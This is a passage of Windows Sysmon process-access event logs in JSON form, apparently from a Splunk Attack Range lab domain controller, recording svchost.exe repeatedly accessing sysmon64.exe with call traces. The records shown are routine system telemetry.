Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 